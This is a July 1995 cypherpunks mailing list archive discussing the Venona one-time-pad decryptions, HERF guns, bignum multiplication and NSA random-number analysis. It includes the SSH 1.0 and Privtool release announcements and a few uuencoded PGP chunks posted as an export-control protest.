solicitation, offer or agreement or any information about any transaction, customer account or account activity contained in this communication. ******************************************************************************* From frissell at panix.com Wed Jul 12 07:28:16 1995 From: frissell at panix.com (Duncan Frissell) Date: Wed, 12 Jul 95 07:28:16 PDT Subject: QED_jak Message-ID: <199507121427.KAA09285@panix.com> At 09:53 AM 7/12/95 -0400, John Young wrote: > 7-12-95. NYPaper: > > > "U.S. Tells How It Found Soviets Sought A-Bomb: Discloses > Clues That Led to Code-Breaking." > > The American intelligence establishment today unveiled > one of its oldest secrets: how a small team of > codebreakers found the first clues that the Soviet Union > sought to steal the blueprints for the atomic bomb in > World War II. Using just brain power -- no computers, > no stolen skeleton keys -- the cryptographers slowly > cracked what was thought to be an unbreakable code. > service. The messages were like a jigsaw puzzle with a > billion pieces -- all black. They had been double-coded > by a system called a one-time pad -- a unique random > code for each message, converting words to numbers in a > pattern used only once. HOO_doo Note Julius Rosenberg's code name was "liberal". The NSA said that the Soviets were using a one-time-pad. The implication is that sloppy encryption practice caused Soviet code clerks to sometimes reuse the random material thus converting the code into a code book system that could be read. DCF "A man perfects himself by working. Foul jungles are cleared away, fair seed-fields rise instead, and stately cities; and withal the man himself first ceases to be a jungle, and foul unwholesome desert thereby. . . . The man is now a man." -- Carlyle From sebaygo at intellinet.com Wed Jul 12 07:34:48 1995 From: sebaygo at intellinet.com (Allen Robinson) Date: Wed, 12 Jul 95 07:34:48 PDT Subject: pgp.zip In-Reply-To: <199507121148.AA16273@armagnac.ucs.usl.edu> Message-ID: Gee, this is not so difficult.... ------------------ PGP.ZIP Part [020/713] ------------------- M=P1!C]JXUTH0KN`[',0'>!-C$8&.:`1/Y-,6[Z,-Y?O"`PK&X=$W*`,;L1HI MF(JAZ(A:$/`XF)C!]4W(Q>?(Q!*\C0YHC!+R+4`>EB`>_7%/4`86X19NX!HN MH0#G<19?81F68`&2D(!W$8/IF(IN$F5@)X0B!*W1`DW1"`;4PQ*I,E!MKPQT ------------------------------------------------------------- for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/ AR %#%=%#%=%#%=%#%=%#%=%#%=%#%=%#%=%#%=%#%=%#%=%#%=%#%=%#%=%#%=%#%=%#%=%#% "Government is not reason... it is force. Like fire, it is a dangerous servant and a fearful master." - George Washington +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ Allen Robinson...................................sebaygo at intellinet.com PGP public key AD022AA9 fingerprint 5A3BC05B2EC67724 F5664A20AEEAB07A From perry at imsi.com Wed Jul 12 07:44:40 1995 From: perry at imsi.com (Perry E. Metzger) Date: Wed, 12 Jul 95 07:44:40 PDT Subject: Don't trust the net too much In-Reply-To: Message-ID: <9507121444.AA10523@snark.imsi.com> Doug Hughes writes: > Go see Winn Schwartau talk about HERF guns sometime. He passed around > a picture of a device for < US$500 that could crash any computer within > 50 yards. If it costs that little, I'd like to see one demonstrated. I've heard of no demonstrations of such things. .pm From perry at imsi.com Wed Jul 12 07:45:17 1995 From: perry at imsi.com (Perry E. Metzger) Date: Wed, 12 Jul 95 07:45:17 PDT Subject: QED_jak In-Reply-To: <199507121353.JAA23961@pipe1.nyc.pipeline.com> Message-ID: <9507121445.AA10531@snark.imsi.com> John Young writes: > "U.S. Tells How It Found Soviets Sought A-Bomb: Discloses > Clues That Led to Code-Breaking." > > The American intelligence establishment today unveiled > one of its oldest secrets: how a small team of > codebreakers found the first clues that the Soviet Union > sought to steal the blueprints for the atomic bomb in > World War II. Using just brain power -- no computers, > no stolen skeleton keys -- the cryptographers slowly > cracked what was thought to be an unbreakable code. The reports claimed the spys were using one time pads in some flawed manner, but did not explain very well what the problem was. Does anyone out there know? .pm From rjc at clark.net Wed Jul 12 07:48:40 1995 From: rjc at clark.net (Ray Cromwell) Date: Wed, 12 Jul 95 07:48:40 PDT Subject: Moby ints [Re: Num Rat] In-Reply-To: <199507120139.SAA07236@shell1.best.com> Message-ID: <199507121448.KAA06858@clark.net> > > At 07:31 PM 7/11/95 -0400, Ray Cromwell wrote: > > However, it's only worthwhile for large > > numbers (>512 bits). At n=512, if your bigints are stored as polynomials > > with a 32-bit radix, then N=512/32=16. 16^1.5 = 64, 16 * lg(16) = 64 > > (so the FFT method and the Karatsuba method are equivalent for numbers > > of that size) > > I conjecture that the constant factor is rather smaller for the > Karatsuba method, so the turnover should be somewhat higher than > 512 bits. True, the Karatsuba method does seem "simplier" than a fast fourier transform (which a naive implementation would use complex math), however Karatsuba has some hidden costs which the FFT technique doesn't. Karatsuba requires dynamically resized integers. (i.e. when you split into subproblems, you have to rescale to n/2 bit integers) Karatsuba also has to do several big_int additions per subproblem that the FFT doesn't. If the FFT-Poly routine is done over a prime field, and it is coded iteratively, it just might come close to Karatsuba for small n. I am not aware of any experimental data, but I am working on the implementation of a high performance portable big_int library right now, and I'll be doing some data collecting. -Ray From ylo at cs.hut.fi Wed Jul 12 07:52:34 1995 From: ylo at cs.hut.fi (Tatu Ylonen) Date: Wed, 12 Jul 95 07:52:34 PDT Subject: ANNOUNCEMENT: Ssh (Secure Shell) remote login program Message-ID: <199507121451.RAA06122@shadows.cs.hut.fi> -----BEGIN PGP SIGNED MESSAGE----- Looking for a secure rlogin? Want to deter IP-spoofing, DNS-spoofing, and routing-spoofing? Want to run X11 connections and TCP/IP ports securely over an insecure network? Worried about your privacy? Then read this. Introducing SSH (Secure Shell) Version 1.0 Ssh (Secure Shell) is a program to log into another computer over a network, to execute commands in a remote machine, and to move files from one machine to another. It provides strong authentication and secure communications over insecure channels. Its features include the following: o Strong authentication. Closes several security holes (e.g., IP, routing, and DNS spoofing and listening for passwords from the network). New authentication methods: .rhosts together with RSA based host authentication, and pure RSA authentication. o All communications are automatically and transparently encrypted. Encryption is also used to protect against spoofed packets. o X11 connection forwarding provides secure X11 sessions. o Arbitrary TCP/IP ports can be redirected over the encrypted channel in both directions. o Client RSA-authenticates the server machine in the beginning of every connection to prevent trojan horses (by routing or DNS spoofing) and man-in-the-middle attacks, and the server RSA- authenticates the client machine before accepting .rhosts or /etc/hosts.equiv authentication (to prevent DNS, routing, or IP spoofing). o An authentication agent, running in the user's local workstation or laptop, can be used to hold the user's RSA authentication keys. o Multiple convenience features fix annoying problems with rlogin and rsh. o Complete replacement for rlogin, rsh, and rcp. Ssh is freely available, and may be used by anyone (see the file COPYING in the distribution for more details). There is no warranty of any kind, and patents may restrict your right to use this software in some countries. Ssh is currently available for anonymous ftp at the following locations ftp.funet.fi:/pub/unix/security/ssh-1.0.0.tar.gz ftp.cs.hut.fi:/pub/ssh/ssh-1.0.0.tar.gz Please let me know if you willing to have your site act as a distribution site. (US sites warning: although this software was developed outside the United States using information available in any major bookstore or scientific library worldwide, it is illegal to export anything containing cryptographic software from the United States. Putting this openly available for ftp in the US may make you eligible for charges on ITAR violations, with penalties up to 10 years in prison. French and Russian sites warning: it may be illegal to use or even posses this software in your country, because your government wants to be able to monitor all conversations of its citizens.) There is a WWW home page for ssh: http://www.cs.hut.fi/ssh. There is a mailing list for ssh. Send mail to ssh-request at clinet.fi to get instructions (or mail directly to majordomo at clinet.fi with "subscribe ssh" in body). All official distributions of ssh are accompanied by a pgp signature by the key "pub 1024/DCB9AE01 1995/04/24 Ssh distribution key ". (Included below.) - -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6.i mQCNAi+btRkAAAEEAKxQ9HwqfsQc9apOIQmFTo2wqbCL6Q1xlvN6CjxkBbtviaLq EgmVPnb/FGD5wwxDMjCCJDwBFfLLRwASQAyyy5RjukkZx1Gn8qHzmoyIOVTFOIJI TFDWyVjMSSvUKACDqXv/xVFunsPlPc7d6f4MwxD1kw2BBpoV7k64di/cua4BAAUR tCRTc2ggZGlzdHJpYnV0aW9uIGtleSA8eWxvQGNzLmh1dC5maT6JAJUCBRAvm7Vv qRnF8ZYfSjUBAW7pBACQ7G2pYStkBM5aOK2udb/m/YAAZ/NlY2emSgEJfYrAysSY 0yfbhKGt0K59fGSotmSRcMOpq0tgTMm7lQjsUr5ez1Ra/0Dv7e3xoGQYJ8764X9w popC+u9JuxLeGTtgWYwPUZIHFcQanZslUmCDr36kvesx/2wXBf8+StghMbA3vw== =aGik - -----END PGP PUBLIC KEY BLOCK----- -----BEGIN PGP SIGNATURE----- Version: 2.6.i iQCVAgUBMAPhQqkZxfGWH0o1AQHgngP/dbcRUFqJF549VvVOWgDtAxu/UoO6hnei 26/OpczgH6j8+6fZh8TV81yVAh95K6EhHsKo85j5hXTmKSG3xLn6fw26q1DPGHpQ Sa4xQ4oL20qcvgOeaEi3gZxxTD5etzdl8eBNbe8vSIkk91yrsAiZL7h8St7UHGsA N5WqXSMI8pg= =tXr9 -----END PGP SIGNATURE----- From Doug.Hughes at Eng.Auburn.EDU Wed Jul 12 08:00:17 1995 From: Doug.Hughes at Eng.Auburn.EDU (Doug Hughes) Date: Wed, 12 Jul 95 08:00:17 PDT Subject: Don't trust the net too much In-Reply-To: <9507121444.AA10523@snark.imsi.com> Message-ID: Hmm.. I'm not sure I'd want to stand too close when one of those things goes off, but it would be an interesting demo. :) Maybe behind an EM shield.. ;) I think there was a question of some microelectronics being permenently damaged because of fusion at the MOS level (burning through the gate), so it might have to be a disposable machine in a place where no other machines are near. It would depend on the magnitude of the charge (and hence cost of the weapon). It might take a very expensive one to do this, or maybe not... -- ____________________________________________________________________________ Doug Hughes Engineering Network Services System/Net Admin Auburn University doug at eng.auburn.edu "Real programmers use cat > file.as" From feanor at anduin.gondolin.org Wed Jul 12 08:04:24 1995 From: feanor at anduin.gondolin.org (Bryan Strawser) Date: Wed, 12 Jul 95 08:04:24 PDT Subject: FW: Edupage 7/9/95 (fwd) In-Reply-To: <199507121418.AA21899@bear-gate.bear.com> Message-ID: <199507121455.JAA12032@anduin.gondolin.org> > > The Leuter report? Leuter was a local moron who claimed to be > > an engineer. He wrote a report claiming to prove that the gas > > chambers somewhere were too small to kill many people. > > For the record: It's Leuchter, Fred Leuchter. there is a good accounting of Leuchter's work in "The Execution Protocol", an examination of Missouri's death penalty process. I can get the ISBN number if anyone is interested. It was also made into a documentary by Discovery. Bryan -- Bryan Strawser, Gondolin Technologies, Bloomington, IN USA Remember Waco feanor at gondolin.org Live free or die From perry at imsi.com Wed Jul 12 08:06:22 1995 From: perry at imsi.com (Perry E. Metzger) Date: Wed, 12 Jul 95 08:06:22 PDT Subject: Don't trust the net too much In-Reply-To: Message-ID: <9507121505.AA10601@snark.imsi.com> Doug Hughes writes: > > Hmm.. I'm not sure I'd want to stand too close when one of those > things goes off, but it would be an interesting demo. :) > > Maybe behind an EM shield.. ;) What is it, exactly, that you imagine could happen to you? You realize that you can expose humans to pretty powerful electromagnetic fields without any noticable effect unless the frequency happens to be one that their tissues absorb. > I think there was a question of some microelectronics being permenently > damaged because of fusion at the MOS level (burning through the > gate), To do that requires that you transfer energy from your device into the computer you are attacking. How do you propose to do that? .pm From dmandl at bear.com Wed Jul 12 08:09:07 1995 From: dmandl at bear.com (David Mandl) Date: Wed, 12 Jul 95 08:09:07 PDT Subject: QED_jak Message-ID: <199507121508.AA11385@bear-gate.bear.com> "Perry E. Metzger" says: > John Young writes: > > "U.S. Tells How It Found Soviets Sought A-Bomb: Discloses > > Clues That Led to Code-Breaking." > > > The reports claimed the spys were using one time pads in some flawed > manner, but did not explain very well what the problem was. Does > anyone out there know? > > .pm It wasn't completely random. They reused some code material: But Mr. Gardner and his colleagues found patterns in unrelated messages. They were proof that exhausted Soviet code-makers had repeated themselves ... Still, it's pretty impressive that the NSA was able to find this. --Dave. -- ******************************************************************************* Bear Stearns is not responsible for any recommendation, solicitation, offer or agreement or any information about any transaction, customer account or account activity contained in this communication. ******************************************************************************* From Doug.Hughes at Eng.Auburn.EDU Wed Jul 12 08:16:11 1995 From: Doug.Hughes at Eng.Auburn.EDU (Doug Hughes) Date: Wed, 12 Jul 95 08:16:11 PDT Subject: Don't trust the net too much In-Reply-To: <9507121505.AA10601@snark.imsi.com> Message-ID: > >Doug Hughes writes: >> >> Hmm.. I'm not sure I'd want to stand too close when one of those >> things goes off, but it would be an interesting demo. :) >> >> Maybe behind an EM shield.. ;) > >What is it, exactly, that you imagine could happen to you? You realize >that you can expose humans to pretty powerful electromagnetic fields >without any noticable effect unless the frequency happens to be one >that their tissues absorb. > I'm thinking better safe than sorry. None of the studies on EM fields and their effects on humans are causal, but a lot of studies and advice have concluded that caution and minimization may be advisable. It's the un-noticable effects that I'm worried about. ;) >> I think there was a question of some microelectronics being permenently >> damaged because of fusion at the MOS level (burning through the >> gate), > >To do that requires that you transfer energy from your device into the >computer you are attacking. How do you propose to do that? > Just relating what I thought I'd heard. It may be wrong, or I may be remembering it wrong. My EM theory is a bit rusty. -- ____________________________________________________________________________ Doug Hughes Engineering Network Services System/Net Admin Auburn University doug at eng.auburn.edu "Real programmers use cat > file.as" From jya at pipeline.com Wed Jul 12 08:25:41 1995 From: jya at pipeline.com (John Young) Date: Wed, 12 Jul 95 08:25:41 PDT Subject: QED_jak Message-ID: <199507121525.LAA08710@pipe1.nyc.pipeline.com> Responding to msg by perry at imsi.com ("Perry E. Metzger") on Wed, 12 Jul 10:45 AM >The reports claimed the spys were using one time pads >in some flawed manner, but did not explain very well >what the problem was. Does anyone out there know? The NYT-reported ceremony was on C-SPAN (1 or 2) last night; I saw only a snippet of Moynihan mumbling. Maybe there will be a replay sometime today that may provide clues to the sharp ear. Held at the CIA, the clip showed lots of backs of heads of creme de les zipped-lipped crypto-slaves. Unctous Freeh, Deutch, the spy-brass were all there, lipping the New Yarper -- an ouvert HERF-zap would have spattered their sucrets. From m5 at dev.tivoli.com Wed Jul 12 08:26:32 1995 From: m5 at dev.tivoli.com (Mike McNally) Date: Wed, 12 Jul 95 08:26:32 PDT Subject: QED_jak In-Reply-To: <199507121353.JAA23961@pipe1.nyc.pipeline.com> Message-ID: <9507121524.AA06294@vail.tivoli.com> Could it be that they were using the pads more than once? That's the simplest flaw I can imagine. Also: > > one of its oldest secrets: how a small team of > > codebreakers found the first clues that the Soviet Union > > sought to steal the blueprints for the atomic bomb in > > World War II. Gee, why did it take a squad of codebreakers to come to the conclusion that the Soviets sought to steal atomic secrets? I mean, couldn't they just kinda scratch their heads and decide it was highly unlikely that the Soviets *wouldn't* do it? And why would they need to "crack" the code at all? Seems like they could do some controlled information leaks and then do some traffic flow analysis via whatever known communications channels operatives were believed to use; all they needed was grounds for suspicion, after all. I assume there's a lot about this not revealed yet, or not clear from the brief synopsis above. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ | Nobody's going to listen to you if you just | Mike McNally (m5 at tivoli.com) | | stand there and flap your arms like a fish. | Tivoli Systems, Austin TX | ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From unicorn at access.digex.net Wed Jul 12 08:34:40 1995 From: unicorn at access.digex.net (Black Unicorn) Date: Wed, 12 Jul 95 08:34:40 PDT Subject: NSA, Random Number Generation, Soviet Codes, Prohibition of Crypto Message-ID: -----BEGIN PGP SIGNED MESSAGE----- ** How a conservative learned to like NPR - Listening to Public Radio this morning I caught a story about the NSA's recent release, or pending release of some 2000 - 2200 documents bearing decoded Soviet communications. These were the result of a long running communications and signals intelligence program conducted by the U.S., and thus, by the NSA and it's predecessors. Some of the documents to be released include communications quite damaging to the Rosenbergs, who were executed for espionage and selling U.S. atomic "secrets" to the Soviets. This is, in fact, the key attraction in the documents. More interesting than all this was the discussion with the deputy director of the NSA in which he described the communications collections program which continued from the 1950's all the way into the 1980's. What interested me most, aside the fact that the NSA was speaking so candidly, and in my opinion foolishly so, about the program (even given their new public relations awareness) was a brief discussion of what methods were used in cracking the Soviet code. While it was not defined specifically, it was suggested that the majority of the messages were communications between the embassies and Moscow. As a result, the procedural and cryptologic algorithm was likely very entrenched as a method, and lacked variation because of the massive coordination required to switch methods in embassy to home country secure communications. While I do not know how much was puffing, I suspect that it is safe to say that the basic method the Soviets were using looked something like this. Plaintext -> Codebook number substitution pass -> One time pad pass. The most difficult, and in the words of the deputy director, "remarkable" task was, of course, attacking the last layer in the encryption, and the first layer in the decryption process, the random series on the one time pad, which, in the words of the public spook, "was not so random after all." The fixed codebook substitution perhaps had a high overhead in the initial computation, but once analyzed the first time the entire cipher is a wash until a new codebook or random number generation method is used. ** "Captain, the energy is structured in a pattern I have never before encountered." - So what does this little disclosure tell us about NSA capabilities? Most obviously that they have extremely sophisticated "random" number analysis abilities. 1950-1980 is a long time to practice, and develop specialized hardware for this purpose. The discussion of the value of specialized hardware gains having been applied on this list to RC4 analysis, its value is still somewhat of a mystery to me with reference to random number analysis. In any event, it is safe to assume that the NSA has a very large section dedicated to this entire pursuit, and moreover, that the Soviets probably were not "petty" random number generators. Perhaps laziness got the best of them, but I am inclined to think they conducted this program, at least at first, like any other massive communist "for the glory of the state" program-- i.e., with crippling dedication. To me this prompts the questions: How random is random, and how random is "cryptographically random?" I don't know much about the mechanics of cryptographically strong random number generation, but considering the enormous effort the NSA has put into the analysis of same, I suspect it is in everyone's best interest to know more. Consider: Now that the NSA has gone public with the program one must believe this prima facie evidence that the program is no longer of use against the Soviets. I suspect that a lot of dedicated hardware, already paid for, is probably sitting about looking for a use. "Hey Louie Freeh, any idea what we can do with all this idle equipment?" So for the cypherpunks, my first suggestion is a long look at exactly how strong the "cryptographically strong" random numbers might be. Certainly we are not random number ignorant, but how random number savvy are we? Perhaps someone with the equipment and the computer time might conduct a bit of an experiment. Maybe lifting the random number generators from common cryptographic applications like CryptDisk Curve Encrypt, PGP, Secure Device, and taking a massive sample to identify trends in the "random" data might be a good idea. Even those processes that employ some physical component might have some trends that could fall into patterns. Even with hard hashes of random seeds, could seed patterns create patterns in the actual random data? I must suspect so. Perhaps a piece of code which could be distributed far and wide to 'punks and others which might generate random data on different machines with different hardware and different users and generate an export file to be submitted to a Web Page or something. We've seen the tremendous value Web Pages have in bringing users together to contribute processor time for the RC4 project, what about random number generation time? One of the first attacks on short-wave radio "number stations" (for the uninitiated, most are based in South America and read off long sets of code numbers, usually in Spanish) was with the assumption that a one time pad had been used. The result? An analyst determined that the "random" numbers for several stations were one time padded with "random" poundings on an old typewriter. Even if not broken, this immediately identified several stations as related by the use of the same one time pad generation method (which is sensitive enough that unrelated stations are quite unlikely to have been privy to the method) and thus provided tremendous traffic analysis information. What does our random data tell the world about us? Could not the bits in PGP keystroke timing subroutines fall into a subtle pattern? Enough of one to make someone's job a lot easier? When you whirl that mouse around the screen to generate random numbers for CryptDisk, do you start with a counter clockwise circle? If you're right handed you're likely to. In the scheme of things, these might be pretty good clues to someone who does nothing but random analysis all day long in a cubical with a frighteningly quick piece of specialized hardware in the next room. ** "He's in a tough position. If he announces he's running, everything becomes a political move, if he announces he isn't, his administration becomes a lame duck effort. Perhaps he should say nothing" - My estimation of the NSA's new public image, which amazed me at first, prompted me to suggest that the bulk of the hyper-sensitive work done there has already been moved to another outfit. To go from "No Such Agency" to a politicized and highly public organization with a public relations department and press releases in just under 30 years is a dramatic change for a secret agency. In many ways it is not a poor move. The agency has grown quite large, and it has become impossible to hide. In addition, the public is much more likely to be receptive to an agency which appears-- in public-- to have some worth. Cryptography is a complex concept, enigmatic at best for the general public. The public relates much better to the capture of spies and the foiling of the Soviet Union than to an agency which is too secret to acknowledge. Public opinion tilting to the NSA might be a bad thing for Cypherpunks. When the NSA says key forfeiture is required, the public is much more likely to swallow the pill from an agency that uncovers traitors, protects our national interest, and has a cool museum that you can visit to boot. Mr. Young rightly pointed out on this list that part of the coin the intelligence community sells, the demand for which moves novels by the millions, is the feeling of inclusion in a select group, a shared secret. How elegant the way the National Cryptological museum was opened. No fanfare, no publicity, no invitations, just there to be discovered at first, like a little secret. Stuck in an old motel, barely visible from Route 32, dwarfed by the massive NSA complex. Talk about public relations coup. Classic intelligence, release what is worthless or nearly worthless, create the impression it is rare, make cursory efforts to obscure it- efforts you know will eventually fail, and you have created something coveted. Wait a while, and then when it has been discovered, uncovered, publicized, put out a brown and white sign: "National Cryptologic Museum." What does DeBeers do any differently? So the NSA has become a political tool. A mouthpiece, and in a subtle way, a propaganda machine. (Just keep the lead counsel out of the public eye guys. He keeps screwing things up. Do a Stephenopolis or Hillary Clinton on him. Time for him to go behind the scenes). We've long been predicting the clash between crypto and government, I doubt government sees it much differently, though perhaps through the foggy lenses of a entity used to getting its way through coercion. I suspect they are likely to do themselves major damage with simple hubris. Still, the signs are out there. They are more and more public every day. I think cryptography scares the administration. It certainly scares the FBI. So I ask some of the same questions I asked here a few months ago. Where are the stealth PGP hacks? Where are the more subtle stego programs? Why aren't there totally transparent strong crypto programs which don't advertise the recipient right in the header? Why isn't crypto prepared to weather the storm of a outright ban? Sure, fight on the side of keeping crypto legal, but prepare for the worst. The fact that everyone and their mother drank didn't keep prohibition from being initially passed. How is it people think it will be the sure fire crypto ban deterrent? -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQEVAwUBMAOxEi1onm9OaF05AQEi6Qf/ZW3qZln5SwPonJnf00OZM7DiPrjg/0+R qzsgolAAnZIr/xFnNP99kzfLf393B5i/8CYO3V0m43VWI4T51b+sBs90Jkiin5hi dals2aa/hCnMKvGfX1RjBo6OmiPmBhiwtvIOkn+tTda37YSWjYuBJ5DOZhXiuW6S CUBxoDoE7yQmNy2BVZU9AKibpF3+Mv2k0yR9PlO0Yc0g8Z+juKR5xxUuMgqpy4HJ qERDYZ6Cd+ADBt/YZGpoESBdishkKfZJeA+J9XApKbR8GiFgeT487ax1/P+Ph+eo 3kMcDEW4O87QbuXa3zewnNrxO306TO04jOeQp6GdJ00IQkRKeru0uw== =6iZQ -----END PGP SIGNATURE----- 00B9289C28DC0E55 nemo repente fuit turpissimus - potestas scientiae in usu est E16D5378B81E1C96 quaere verum ad infinitum, loquitur sub rosa - wichtig! *New Key Information* - Finger for key revocation and latest key update. From adam at bwh.harvard.edu Wed Jul 12 08:40:28 1995 From: adam at bwh.harvard.edu (Adam Shostack) Date: Wed, 12 Jul 95 08:40:28 PDT Subject: FW: Edupage 7/9/95 (fwd) In-Reply-To: <199507121418.AA21899@bear-gate.bear.com> Message-ID: <199507121540.LAA09468@asimov.bwh.harvard.edu> Dave Mandl wrote: | For the record: It's Leuchter, Fred Leuchter. | | > ago for "practicing engineering without a license." A good rebuttal | > of his report was written up by (I think) William McVey, in Canada. | Ken McVay. And dozens of other people too. The newsgroup is | alt.revisionism. If you've got any interest in the "holocaust | revisionism" phenomenon, it's well worth at least a brief look in | there. Thanks for the corrections, Dave; you're correct on all these points. -- "It is seldom that liberty I Support The Phil of any kind is lost all at Zimmermann legal defense fund once." -Hume http://www.netresponse.com/zldf ------------------ PGP.ZIP Part [001/713] ------------------- M4$L#!!0````(`">9ZQX3(*,_DG8!`-JF`P`'````4$=0+D581>S;=UQ3U__X M\9M!$E8,TT at PJ$10$1=*41%WW`KX$=Q[M5KK`&R%(HH+(T.M"S>NME8K=31N M:A$[K+5(K:O5BE405ZE:1"3?UTW`:K_]\/G\?O_^?CX>3^_-S;GGO,^\`^@W ------------------------------------------------------------- for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/ From mark at unicorn.com Wed Jul 12 08:41:28 1995 From: mark at unicorn.com (Rev. Mark Grant) Date: Wed, 12 Jul 95 08:41:28 PDT Subject: Privtool 0.84a Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Ok, version 0.84 didn't work properly on Linux, so I'm now releasing a version 0.84a with fixes to make it compile. US users can get the sources from from ftp.c2.org:/pub/privtool/privtool-0.84a.tar.gz, or in Europe at ftp.ox.ac.uk:/pub/crypto/pgp/utils/privtool-0.84a.tar.gz. It will also be available soon on ftp.dsi.unimi.it. US ITAR laws may make it a crime to export Privtool, so if (like me) you're not in the US then get it from the European sites. In addition the documentation is available on the WWW at http://www.c2.org/~mark/privtool/privtool.html. Mark Privtool Beta Release @(#)README.1ST 1.16 7/12/95 ----------------------------------------------------- Privtool ("Privacy Tool") is intended to be a PGP-aware replacement for the standard Sun Workstation mailtool program, with a similar user interface and automagick support for PGP-signing and PGP-encryption. Just to make things clear, I have written this program from scratch, it is *not* a modified mailtool (and I'd hope that the Sun program code is much cleaner than mine 8-) !). When the program starts up, it displays a list of messages in your mailbox, along with flags to indicate whether messages are signed or encrypted, and if they have had their signatures verified or have been decrypted. When you double click on a message, it will be decrypted (requesting your passphrase if neccesary), and/or will have the signature checked, and the decrypted message will be displayed in the top part of the display window, with signature information in the bottom part. The mail header is not displayed, but can be read by pressing the 'Header' button to display the header window. In addition, the program has support for encrypted mailing list feeds, and if the decrypted message includes another standard-format message it will replace the original message and be fed back into the display processing chain. When composing a message or replying to one, the compose window has several check-boxes, including one for signature, and one for encryption. If these are selected, then the message will be automatically encrypted and/or signed (requesting your passphrase when neccesary) before it is sent. You may also select a 'Remail' box, which will use the Mixmaster anonymous remailer client program to send the message through one or more remailers. Being an Beta release, there are a number of bugs and nonfeatures : Known Bugs : Message list scrollbar often set to stupid position when loading a mail file. When you save changes to the mail file, it throws away the signature verification and decrypted messages, so that the next time you view a message it has to be verified or decrypted again. 'New mail' indicator in icon does not go away if you open the window and close it again without reading any messages. Known Nonfeatures : Currently if you send encrypted mail to multiple recipients, all must have valid encrpytion keys otherwise you will have to send the message decrypted. Also, the message will be sent encrypted to all users, not just the one who is receiving each copy. 'Add Key' button is enabled and disabled as appropriate, but does not do anything ! A number of other buttons and menu items do not work either. Passphrase is stored in ASCII rather than MD5 form, making it easier for hackers to find if you're on a multi-user machine (of course, you shouldn't be, but many of us are). Kill-by-subject does not work. Ignores Reply-To: lines, and could probably do with an improved mail-reading algorithm. Only one display window, and only one compose window. Code should be more modular to assist with ports to Xt, Motif, Mac, Windows, etc. Not very well documented ! Encrypted messages are saved to mail files in encrypted form. There is currently no option to save messages in decrypted form. No support for anonymous return addresses. Not very well tested on Solaris 2.x, or Linux. Major changes for 0.84: Added 'Forward' option to 'Compose' button. Support for Mixmaster and multiple pseudonyms. Due to a bug in the current version of Mixmaster, note that messages have to be saved to a temporary file for mailing. Fixed file descriptor leak in pgplib.c which could make the program hang occasionally when saving changes. Added support for 'smallring.pgp' to speed up access to commonly used public keys. This version is thought to work on Linux, however I haven't been able to test that myself. Changes supplied by David Summers (david at actsn.fay.ar.us). Changes for 0.84a: Linux testing showed up some problems with 0.84. This has been solved by using Rich Salz's parsedate() function to parse the dates on mail messages. This is now supplied in a linux subdirectory, and appropriate changes made to the Makfile to allow it to compile correctly on Linux. Changes supplied by David Summers (david at actsn.fay.ar.us). Fixed another hang by deleting the lock file if we failed to open the mail file while saving a message. Privtool can be compiled to either use PGPTools, or to fork off a copy of PGP whenever it is needed. There are also a number of different security level options for the passphrase, varying from 'read it from PGPPASS and keep it in memory' to 'request it every time and delete it as soon as possible', via 'request it when neccesary and delete it if it's not used for a while'. See the README file for information on compiling the code, and the user.doc file for user documentation (the little that currently exists). You should also ensure that you read the security concerns section in user.doc before using the program. Mark Grant (mark at unicorn.com) -----BEGIN PGP SIGNATURE----- Version: 2.6 iQEVAgUBMAPq5lVvaTo9kEQVAQG48gf9EXXCBm42agXpfJP1ePuI5zbDujtaWhGb khAPRrlPJJ5QeZp3wz0DMDjhvSJjz2dlyxYj5u61kgbfybhxr2lAzwYL4k89A/B+ aHSggEMpKYwosd9FZEZ30pG1ufYeEI0eJw0hHuZzIIbGzTy3x+IfVY9h41F+ewkV fbAtw5jwZKI43cil0cds3DFLHYOhiuWUU72KUCHABgvQfLPBYCJ4F3nW64GduxtA idjHrcfe3ZJNLJEQ1VsHbqbAgND2jzB/8C84kw9Nb9wgd+zTdgnnJPWidpqHZqe2 ymBX1JD675WrKORnZlTI28haIcajPnLp5nXy2Ycs+/5RMuW/AVlYhg== =4M+l -----END PGP SIGNATURE----- From perry at imsi.com Wed Jul 12 08:50:35 1995 From: perry at imsi.com (Perry E. Metzger) Date: Wed, 12 Jul 95 08:50:35 PDT Subject: NSA, Random Number Generation, Soviet Codes, Prohibition of Crypto In-Reply-To: Message-ID: <9507121550.AA10682@snark.imsi.com> Black Unicorn writes: > More interesting than all this was the discussion with the deputy > director of the NSA in which he described the communications > collections program which continued from the 1950's all the way > into the 1980's. There may be a misunderstanding -- just to be clear, the implication was that they were working on some of the 1950s traffic into the 1980s, and not that there was any new traffic available of late... > In any event, it is safe to assume that the NSA has a very large > section dedicated to this entire pursuit, and moreover, that the > Soviets probably were not "petty" random number generators. I've heard that standard 1920s-1950s one time pad generation techniques involved telling lots of secretaries in the code section to type numbers at random onto carbon paper forms. No joke. Perry From jim at acm.org Wed Jul 12 09:03:15 1995 From: jim at acm.org (Jim Gillogly) Date: Wed, 12 Jul 95 09:03:15 PDT Subject: Rosenberg/VENONA: two time pads [Re: QED_jak] In-Reply-To: <9507121445.AA10531@snark.imsi.com> Message-ID: <199507121601.JAA20564@mycroft.rand.org> > "Perry E. Metzger" writes: > The reports claimed the spys were using one time pads in some flawed > manner, but did not explain very well what the problem was. Does > anyone out there know? The AP story by Rita Beamish says: The Venona program translated 2,200 telegrams intercepted mostly from 1942 to 1945. They were double encoded with a complex numerical system that used a different random pattern for each message, officials said. The code would have been impossible to crack had not the volume of traffic resulted in the Soviets sloppily repeating some of the patterns, said Kahn. The "repeating some of the patterns" means to me "two time pad". Lots of work in general, but doable, unlike the one time pad. Jim Gillogly Mersday, 19 Afterlithe S.R. 1995, 16:00 From ayen at access.digex.net Wed Jul 12 09:03:47 1995 From: ayen at access.digex.net (Doug Ayen) Date: Wed, 12 Jul 95 09:03:47 PDT Subject: Don't trust the net too much In-Reply-To: <9507121444.AA10523@snark.imsi.com> Message-ID: 